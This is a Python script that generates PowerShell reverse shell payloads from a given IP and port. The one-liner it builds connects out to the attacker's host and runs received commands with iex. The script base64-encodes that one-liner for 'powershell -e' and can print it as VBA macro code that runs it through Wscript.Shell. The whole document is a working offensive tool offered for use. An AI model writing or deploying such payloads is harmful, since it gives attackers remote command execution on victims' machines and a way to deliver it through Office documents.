Created
March 12, 2024 15:43
Generate PowerShell reverse shell payloads
#!/usr/bin/env python3
# Author: Jakob Friedl
# Description: Generate powershell reverse shell payloads
#
# Flat script: reads a host and port from the command line, substitutes them
# into a fixed PowerShell one-liner, base64-encodes that one-liner in the form
# `powershell -e` expects, and prints the result either as a single command
# line or (with -m) as VBA string-concatenation statements.
import sys  # imported but not referenced anywhere in this script
import base64
import argparse

parser = argparse.ArgumentParser(description="Powershell reverse shell generator")
# Both positionals are taken as plain strings; `port` is converted with int()
# below, so a non-numeric port surfaces as a ValueError rather than an
# argparse usage error.
parser.add_argument('ip')
parser.add_argument('port')
parser.add_argument('-m', '--macro', action='store_true', help='Generate payload in VBA format for Microsoft Office macro')
args = parser.parse_args()

# Template with two %-format slots: the host as a string (%s) and the port as
# an integer (%d). The `%%{0}` inside the template is an escaped percent sign
# so that a literal `%` survives the formatting step below.
payload = '$client = New-Object System.Net.Sockets.TCPClient("%s",%d);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
payload = payload % (args.ip, int(args.port))
# `powershell -e` takes base64 of UTF-16 text. Python's 'utf16' codec emits a
# 2-byte byte-order mark in the host's native byte order; the [2:] slice
# drops that BOM. Base64 here is only a transport encoding, not encryption:
# decoding it yields the plain one-liner above, which is what reviewers and
# logging that capture the decoded command will see.
cmdline = "powershell -e " + base64.b64encode(payload.encode('utf16')[2:]).decode()
if args.macro:
    # Line length: number of characters placed in each VBA `Str = Str + "..."`
    # statement so the encoded string is split into fixed-width pieces.
    n = 50
    print("Dim Str as String")
    for i in range(0, len(cmdline), n):
        print("Str = Str + " + '"' + cmdline[i:i+n] + '"')
    print('CreateObject("Wscript.Shell").Run Str')
else:
    print(cmdline)